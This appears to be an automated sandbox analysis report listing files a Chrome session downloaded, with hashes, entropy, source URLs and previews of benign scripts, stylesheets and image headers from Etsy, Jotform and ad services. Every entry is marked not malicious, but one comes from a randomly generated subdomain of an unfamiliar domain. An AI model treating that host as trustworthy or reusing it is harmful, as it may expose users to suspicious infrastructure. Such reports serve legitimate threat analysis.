                                                                                                                                                                              Preview:/**. * @file protoplus.js. * @title Prototype Plus Extensions Library. * @author Serkan Yersen. * @company Interlogy LLC. * @version 0.9.9. * @todo Perform a complete test for all CSS values for shift. * @todo Read CSS classes and add Morping. * @todo Write a complete documentation. * @todo Add droppables. * @todo Add resizables. */.if(window.console === undefined){. if (!window.console || !console.firebug) {. (function (m, i) {. window.console = {};. var e = function () {};. while (i--) { window.console[m[i]] = e; }. })('log debug info warn error assert dir dirxml trace group groupEnd time timeEnd profile profileEnd count'.split(' '), 16);. }. window.console.error = function(e){ throw(e); };.}.window.requestAnimFrame = (function(){. return window.requestAnimationFrame ||. window.webkitRequestAnimationFrame ||. window.mozRequestAnimationFrame ||. window.oRequestAnimationFrame ||.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):71115
                                                                                                                                                                              Entropy (8bit):7.996960337855892
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:ADC14BDD2682AA833CC632ECE050F225
                                                                                                                                                                              SHA1:EA64B00C53BBFE2FCE3AC7479CAA584BE761C214
                                                                                                                                                                              SHA-256:22ABFDE9C8C259ED13B10AE863D9357329FDC060FB3CEE55FAE43C5B14C49EDC
                                                                                                                                                                              SHA-512:B0585950543131924ADCB06A13B12EBE4F564F92EFDB164D7B7FAB55931ABCF36B2031B7E3135DA7F35594B6785E57CBE17C9FA8F5BBF05D88A833909F47936D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/r/il/9f65be/6273831468/il_794xN.6273831468_meai.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma...................mdat.....&q.g.....2...Dd.a..P...x.....}5..0..dC^....'.=.N.6f>Oc.1n..`.\....qH....r.p....7.&.x. ."..c#.J.....J .<I.:.O\..n.{..{..(..r8X.%.....V...\Q..Er.s..4E.`......@.b.)/.P#.6aQ^!.P.=C|{......M.......Mcj.h.`0.w.............*..#ih...rJj.._.w, ......^.-w.....*..s.%V..pU..1..j>U.}X....,|cD.:L.R...!..v...j..y......;. .0.-.....eW<...q.e..k.[m%,... (....F..)..y....C._...-%|3....HC.F4.'c........Ris..4.w..&..cJm..z.#...F...?V]..4..8...."..".:#..3...P.....ci..%....{.e..M..h.$Nz....CFI.wx$..Y...&*...N.H.!.t.t../Y..........0$..Or~S.(O..../.4!......a.P a.ih.^.../5.P.l.j..(.h.u9.(.m..n6....b........1......Le.T..#HM......./>.d5..@..........N.`..2.p.{[....*d.....{;....}..2!.]..,.z|h..W....uW.]?....r...1.P.{>....r
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):125833
                                                                                                                                                                              Entropy (8bit):7.970325259683653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A8630F28B098B9F736AADFF43D0C0689
                                                                                                                                                                              SHA1:5DF4377B9521269212E096F6620D6A4040301614
                                                                                                                                                                              SHA-256:673BE45B2DB8AA6026ADB1EE8639012B5B42A8CC07E7667035585E65B894760C
                                                                                                                                                                              SHA-512:0E55003D53413547CEDD6552DE261F94E06ED047D2486B1A3ACB7281FDEAFF007CA35AAB8A5EB87EA4049A38EDD7262C6DED7FB8D91FD0203F696EFBFD6E1447
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................W.........................!.1."AQ.aq.#2B.....3Rb..$r..%CS....&4Dcds....5tu..6...EUeFT.................................8.......................!1.AQ."a.2q...#BR...r.$3bC.4DS.............?..&]X.....3..y.t.,...,b..9.a.{.....%..d..y..O..EL.!...P7.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28
                                                                                                                                                                              Entropy (8bit):3.7709424217485368
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5FD64B7E2C36B0C715F31D28B3E27CA8
                                                                                                                                                                              SHA1:0BE198A9762F951297DBC2DA6E26BF7B3A8A3917
                                                                                                                                                                              SHA-256:16EE8B58F0E3C1D1FDDC8B0AD3F1BCE551518EB9BEBE349329246005AD53789D
                                                                                                                                                                              SHA-512:B13B1D32DEF0FFCBF9A89C0A45E7E5780FCE3DC14C4B25F90988A33A396C14A1FD8E91ADD7D8D827C782E6A5DD096242B4A7CADBAA7F7E6728117F0C1B353C79
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkKnK3FVGs2RRIFDUHqUa4=?alt=proto
                                                                                                                                                                              Preview:ChMKEQ1B6lGuGgQICRgBGgQIZBgC
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (4468)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4602
                                                                                                                                                                              Entropy (8bit):5.124108353798888
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D03DE02AD2755E5790E0A7BDAA2A1E61
                                                                                                                                                                              SHA1:6D0A962A473E8109C1D39EA33B16D300799F554A
                                                                                                                                                                              SHA-256:01244B4BCD332B38A695898EBABB0EBFBB22BFAFA565A7907A42C8538580B7EA
                                                                                                                                                                              SHA-512:43FC76F78A8B8016EC2E5F4053BEED98C8D0CB08C083CEC5D521A3C328518DC5175D58C61B330B43FC94EB3D5C21371642E23D66DD42EA5A2AFFA57FB1D9C87F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/async/component-islands/vendor.1433eefd9b52fe38384e.js
                                                                                                                                                                              Preview:"use strict";(self["jsonp-component-islands"]=self["jsonp-component-islands"]||[]).push([["async/component-islands/vendor"],{36702:(t,e,s)=>{s.d(e,{ActionTypes:()=>i,browserHistoryApiIsSupported:()=>r,default:()=>n});const i={PUSH:"etsy/history/PUSH",REPLACE:"etsy/history/REPLACE",GO:"etsy/history/GO",BACK:"etsy/history/BACK",FORWARD:"etsy/history/FORWARD",LOCATION_CHANGE:"etsy/history/LOCATION_CHANGE"};function r(){const t=window&&window.history&&window.history.pushState;return!!t&&!false}const n=t=>()=>e=>s=>{switch(s.type){case i.PUSH:t.push(s.payload.to,s.payload.state);return;case i.REPLACE:t.replace(s.payload.to,s.payload.state);return;case i.GO:t.go(s.payload.delta);return;case i.BACK:t.back();return;case i.FORWARD:t.forward();return;default:return e(s)}}},35742:(t,e,s)=>{s.d(e,{default:()=>S});var i=s(75559);function r(t,e,s){e in t?Object.defineProperty(t,e,{value:s,enumerable:true,configurable:true,writable:true}):t[e]=s;return t}const n=(0,i.createSlice)({name:"_noop",initia
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (21664)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):21705
                                                                                                                                                                              Entropy (8bit):5.40422278032234
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8823BEC32C19D47E3222D73E54461416
                                                                                                                                                                              SHA1:A5B2C6B1BDAB810B155B0AE9D4633D7622B26464
                                                                                                                                                                              SHA-256:4EAE1551C92E4066787CC922BD04662EA862951EC1FD8B2AF3247E35DF720EE7
                                                                                                                                                                              SHA-512:E7B02D0E2925485212DD59F53871457AF56F930F2F9F4943A959501BF0481F6046EC8E046E6F71070CB97BEC8001CE02A60C9DE27D4488017C52988DBB467CA2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn01.jotfor.ms/s/umd/09d1d05b489/for-sanitize.js
                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-sanitize"]=t():e["for-sanitize"]=t()}(this,function(){return function(){var e,t,n={47918:function(e){var t;t=function(){"use strict";let{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object,{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});let u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),y=b(String.prototype.indexOf),T=b(String.prototype.trim),E=b(Object.prototype.hasOwnProperty),_=b(RegExp.prototype.test),A=(q=TypeError,function(){for(var e=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):52176
                                                                                                                                                                              Entropy (8bit):4.276609475347379
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C344DC53C8DE38F6FC7FFC8AFEEEEE6E
                                                                                                                                                                              SHA1:741CCCEAE012742C0A0B7C5FA96A36DEA156A323
                                                                                                                                                                              SHA-256:CED3B19DBAF9805D635D9B2E6AF1D83C752D8E677EF41728C3AA1E5990F6FF3F
                                                                                                                                                                              SHA-512:336797FCAE0BEEA9D89079C3BE5C83651B713DAE0AD2917774C20447E67444C78E592B6A099E60D981E680CD8AE2D91952F9D95C750452548AACB141EF63DD46
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.adsrvr.org/up_loader.1.1.0.js
                                                                                                                                                                              Preview:(function () {. "use strict";. // log related. let logLevel = null,. logCategory = "(TTD)";. const LOG_LEVELS = ["debug", "info", "warn", "error"];. let Logger = LOG_LEVELS.reduce(((e, t, n) => (e[t] = function () {. const e = "debug" === t ? "log" : t;. if (logLevel && console && "function" == typeof console[e]) {. const a = LOG_LEVELS.indexOf(logLevel.toString().toLocaleLowerCase());. if (!0 === logLevel || a > -1 && n >= a) {. for (var r = arguments.length, o = new Array(r), i = 0; i < r; i++) o[i] = arguments[i];. const [n, ...a] = [...o];. console[e](`${t.toUpperCase()} - ${logCategory} ${n}`, ...a). }. }. }, e)), {});.. function updateLogLevl(l) {. logLevel = l. }.. // config example:. // {. // "cssSelectors": ["input[type=email]"],. // "detectionSubject": ["email"],. // "detectionEventType": "onclick",. // "tri
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12970
                                                                                                                                                                              Entropy (8bit):7.899091985251517
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AA5FDB94002713EB3719F8D84A7BCD0A
                                                                                                                                                                              SHA1:81DFC18D580E6D6267F40430D351887FD7DB1A8D
                                                                                                                                                                              SHA-256:DE34E2F05095A8ECC48D86E2F88AE5683747764FF49EB4E05F250D9587FDF3F1
                                                                                                                                                                              SHA-512:C620C4813CCE338A809BB3259047642A91C3AC6CDC79A68BA15F592A406CFE3322E14A7903DD1D96B66B9211AEF86A23F3115FA0B2D2FFB53CFD178252345056
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................D.........................!1.A."Qaq.2rs......#$35B.Rb.4Cc...S....................................:........................!1.AQq.."2a...#3B..$r.Rb....4C.S............?....B..!.B.]*B.$]..s..t.*...7z....S...U.'.....VU......%].~.M..5Ty..'.V.(...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                              Entropy (8bit):4.727547796291813
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D24F433AE1916185B0E4E20ED76CB64B
                                                                                                                                                                              SHA1:E0C8D4C58B7D0983F9B4042BEA94C014CD5EC668
                                                                                                                                                                              SHA-256:F40A7B02A8A2D420AA9D4CB5B0B26A92468828984FDC4B0D1202DE4E24F59859
                                                                                                                                                                              SHA-512:27DC9609B3C3FECE38EFB136F3EF0C3EC99740CC10311C1EC42EF6469BC4580472150306106A1FA5C7DB0B6E3A9A83382C2D07405A506A1202911A7EB064319C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://static.captcha-delivery.com/captcha/assets/tpl/device-check/index.css
                                                                                                                                                                              Preview:/* Default color */.:root {. --device-check-spinner-color-1: #17cdda;. --device-check-spinner-color-2: #17bbf4;. --device-check-ok-color: #1A8461;. --device-check-ko-color: #ce331f;.}..body {. font-size: 18px;. text-align: center;.}...device-check__title {. font-size: 2em;. font-weight: bold;. padding: 0.5em;.}...device-check__header__logo-wrapper {. max-width : 200px;. width : 100%;. margin : auto;.}...device-check__header__logo {. width : 100%;.}...device-check__spinner-wrapper {. width: 100px;. height: 100px;. margin: 0 auto;.}...device-check__spinner {. animation-delay: 1s;.}...device-check__spinner-wrapper .device-check__spinner {. animation: loading 1.8s linear infinite;.}...device-check__spinner-wrapper .device-check__spinner-1,..device-check__spinner-wrapper .device-check__spinner-2 {. animation: bounce 2.2s ease-in-out infinite;.}...device-check__spinner-wrapper .device-check__spinner-2 {. animation-delay: -1s;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://ummxywds674y02hzzfgqdtufuyrhly9j15bulhfzvjwjvxpsaen9.belonfal.com/xtgtdvsufvffykqwgkeajwggnNHTjLNHAPVOXYGBXXYPFTYGEBVCVEYRZBGMMPBQKEHHTQNOGMO
                                                                                                                                                                              Preview:1
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):31119
                                                                                                                                                                              Entropy (8bit):7.990871935573128
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F920B685530C016D3B4CE8DAC243006C
                                                                                                                                                                              SHA1:6AED48A1DADA9F90D991621BBD02DE3783F54566
                                                                                                                                                                              SHA-256:2C925FFE2FCEC0E9CAC6142214E86D3BA468FD03A9FC9F12119BDD59054A7848
                                                                                                                                                                              SHA-512:66530B5572BF2D5004753DE582FB8EBB1EBDCE71969F9FECC0C65E06B20318847B5EA836C242EAFDE22114F59A8BEC04F6893A385CF283D0198FACF6E82C1930
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/16759523/r/il/286334/3273691450/il_600x600.3273691450_rap9.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................x....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................x.mdat.....&ey_.....2...D8.0..P...W.~sv....x.....y;...tk?q.Y..C...O.:.........*DEU..#.....o..2.>.x.......?.."D.. J.N.@Cu.....v.V..6z..L.....%....FB..TP.N..Br...C=.bT.....Q\v :.0....w......(=....t.........Gx.-....#..*)..K.../;D9.4.V..LWzcnhR4r.8...K..U.{..;.....nT....r...K\R....yaj.5t./.1..3 r.........<`'F...7b...2XY.n.E...o..*.h.Y............i...n.&.b._&.Wp.B?.?..s..p...d.*.a.~=[...Fx...Wk.8.....7'Sq.O...Q.).....4...p.{.6<..........3}.7........R.....{v...~-..*.Q...2n<}c.=.Gg...._YL.n.Q.,j..a.f. u..g3...)..*.d....o.X.`.\.=.T...77........"......t.\N.....9Z..J....";{....ij.d`..U...2.....1...iG.>l.A...>.PX..!....bV.....]D.......F{..+.@?.m..a..O..qW..f..`S.iG[.?.t.N4..j...3w+..Q.......G.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3468
                                                                                                                                                                              Entropy (8bit):4.931775589840537
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0B64C9DEE00DA0FFC3D7738E130496A1
                                                                                                                                                                              SHA1:F378DFF2E18ADC8AA265EDC2414CC89C2ED65C42
                                                                                                                                                                              SHA-256:F5D12CEDEFF963FF638A8C26838D1AF633E2CA441770756C12343B9CE60D089A
                                                                                                                                                                              SHA-512:F4261157700D79E5E026A4E8772F4DAA05926D61E27E4E2011D91CEFE905885C90E3930FE18D9644876C6FBFAFC1B28CDA43FD898B0AD9CFB004EF8F4182F8E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.jotfor.ms/css/form-message.css?v=2.7
                                                                                                                                                                              Preview:*{. box-sizing: border-box;.}.p {. margin: 0;.}.a {. font-size: 16px;. text-decoration: none;. color: #0099FF;.}..jotform-link {. position: fixed;. top: 0;. left: 0;. right: 0;. background-color: #0A1551;.}..logo-image {. width: 153px;. margin: 0 30px;.}.body {. font-family: var(--fontFamily, 'Circular'), sans-serif;. -webkit-font-smoothing: antialiased;. text-rendering: optimizeLegibility;. margin: 0;. width: 100vw;. height: 100vh;. background-color: var(--clrBg, #F3F3FE);. color: var(--clrText, #0A1551);. background-image: var(--bgURL, none);. background-repeat: no-repeat;. background-size: cover;. background-attachment: fixed;. background-position: center top;.}..form-message {. min-width: min(550px, 100vw);. height: 100vh;. display: flex;. flex-direction: column;. align-items: center;. justify-content: center;.}..jotform-error-message {. width: 100%;. height: calc(100vh - 59px);. position: absolute;. bottom: 0;.}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                              Entropy (8bit):4.5969897580127865
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9C2160161305054AF467EA797A7C408F
                                                                                                                                                                              SHA1:8B427BC141874CC164E2BE3DB02079FCC99AF9ED
                                                                                                                                                                              SHA-256:7F47F02C93D5DE5DE03DB0EBFFA39FE1060767437B086996E295C9818A05B2F2
                                                                                                                                                                              SHA-512:FCCC6474CC18139B34DC40F6009C358753658E34CC2DF5B7D2C4E253BFE9647957A2FD23F30C86EC2087C2B250BCB0C570BB9EEF54B10DF6C4A3A6659F56F228
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://bat.bing.com/p/action/4020083.js
                                                                                                                                                                              Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 75x75, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2794
                                                                                                                                                                              Entropy (8bit):7.347670662675785
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7EE853C7818C35A56C806A183CD0F66F
                                                                                                                                                                              SHA1:81D2136180EC6B488B19F09CE767DE54E14F7007
                                                                                                                                                                              SHA-256:A51FE197A8DAFAD0D51902372614AAE3D8B476AEDDAEB3F5555C9E0DA739A78D
                                                                                                                                                                              SHA-512:27F739423D76015BD0A44D80C0559B131DDEF33CDB75AE1525CBFCEDEFA3121761F170AF880051566721D2F9970DA8512D10D5D2772ABC5ADC872D9AAE5E9EFD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......K.K..".........................................5..........................!.1.AQ."2aq...B.RS#$%CTr................................*........................!1Q..A.#aq."B...............?..Y..=hb.....<."J.....G....S\n..........M..V...4N.%..AEC5.3.....j.a1r.OC....zq.[..i..q0..>......Y'....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):14809
                                                                                                                                                                              Entropy (8bit):7.979328218605672
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E4AE35EEB157DAD721FBDFFD3671C968
                                                                                                                                                                              SHA1:5B634045E999868B2AAB4BB4ED681C8C5EF41B4C
                                                                                                                                                                              SHA-256:1C8D008F0D354CC054AC48BBC92B6D2CF597CCBB96955A54B99BAB46EF261E47
                                                                                                                                                                              SHA-512:2E0A2561247AF7506813AF386CB91187A21F5E32B2CBFAE20EA0A4FC5E07C04E5B2F1D50D4435139DDCA07D25D3CE47506141F82367FE1A9B444070506DB7EDE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/10296233/c/2250/2250/106/0/il/869ecb/2091916129/il_600x600.2091916129_8djg.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................8....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................8.mdat.....&ey_.....2.q. ...A@....o.....$.=..<lE.$..9jB3....T.B.6.S.L?..y.H..=.Y.u..l].?4.J.Y.U...^..' >..Y.uH.0.4..%..{...{.i"X"....... b.l$..Z....R.My..O...{......2.a..i..:...h$...8..u{.,...S.>{u*.0.......F..1!v.x.9..........H.6...HR.z........z.p..%.Ui%.......~.......Tz.H.......@;d.g!.u...u...].9f.q..N.*..9.......2:..r...NL%x...;....t%...(5...-pR../..z~T.'.%.I{.]p...../M......... L..Nr.."LR$`.....>...R...=..kn.i.Y..........4..A~.3.%._..u.b.a........N..dc.>.>.....[..0,.E....HS../.....]..z......`..U&Uy......yt..ri..F K...s<.3m..!QBa..d6......3..,..\.Q.Y..wM.!F.Jc8.k..i..y.....6Z..Z...|.?.gK.@..J.!...%n..>.d..J..H.)..o$k.R{.^...|.B."..e.....0Z..R.....B...<z....U.fDD.vO.....0BZ.!K]Mc.O.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (49873), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):49873
                                                                                                                                                                              Entropy (8bit):5.049084285250599
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C8D7C12B8FBA224051F3F13811403637
                                                                                                                                                                              SHA1:7FA8FBB7581D65EE6D892E19E4E01E6B0C7A131A
                                                                                                                                                                              SHA-256:A228455BD7281927FBCE9892108C334529E2B0200C2D29D9FC0954B65E28958D
                                                                                                                                                                              SHA-512:01092C4C26A8EC27359C23B7098697F089F2C6198E62565D4D2479776736BF3E69D14FBF3787768CBFF95C144C9646A69B0F8D5B1DE2E266B99A9753855B3433
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/neu/modules/listing_card.00d19f16e05ad5,neu/common/responsive_listing_grid.74cb1c37c4995e,neu/modules/favorite_button_defaults.74cb1c37c4995e,web-toolkit-v2/modules/images/images.74cb1c37c4995e,common/listing_card_text_badge.b1c6bd381ce780,web-toolkit-v2/modules/cards/cards.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview:.stars-svg{vertical-align:middle;white-space:nowrap;display:inline-block}.stars-svg .rating{color:#757575;vertical-align:baseline;font-size:0;display:inline-block;position:relative}.stars-svg .rating.lit{color:#ffa300}.stars-svg .etsy-icon{width:18px;height:18px}.stars-svg.stars-smaller .etsy-icon{width:14px;height:14px}.stars-svg.stars-larger .etsy-icon{width:20px;height:20px}.stars-svg.editable .rating{cursor:pointer}.stars-svg.editable:hover .rating{color:#757575}.stars-svg.editable .rating:hover{color:#ffa300}.stars-svg .stars-svg-half-star .foreground{fill:#ffa300}.stars-svg .stars-svg-half-star .background{fill:#757575}.stars-svg.hide-title{pointer-events:none}.set-review-stars-line-height-to-zero{line-height:0}.favorite-listing-button{opacity:1;color:#0000;border-style:none;width:66px;height:66px}.favorite-listing-button.in-search{width:44px;height:44px;top:0;right:-4px}.favorite-listing-button.btn-transparent.has-hover-state:hover{opacity:1}.favorite-listing-button.btn-transpar
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):56538
                                                                                                                                                                              Entropy (8bit):7.99588868324618
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2A1BF4EDEE22C3C10D013B91D0B16FD3
                                                                                                                                                                              SHA1:A6C0E76D9AA5848A0C3567542EBE2E704A600DFD
                                                                                                                                                                              SHA-256:4546A665E9F996341817692D99285239E20D40AF2BA565F6FEF9F47824B47514
                                                                                                                                                                              SHA-512:598FAA4C8F64A9D2BB4684CB7AD7F88E6D8D348B4749728452D1DF36901A8A4C028E61DDCBD89244648F01B6193A74016BD2B4FD1269F0047D806CE5546507E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/14114560/c/1371/1090/0/140/il/7cd4c5/2566957822/il_680x540.2566957822_cpx4.jpg
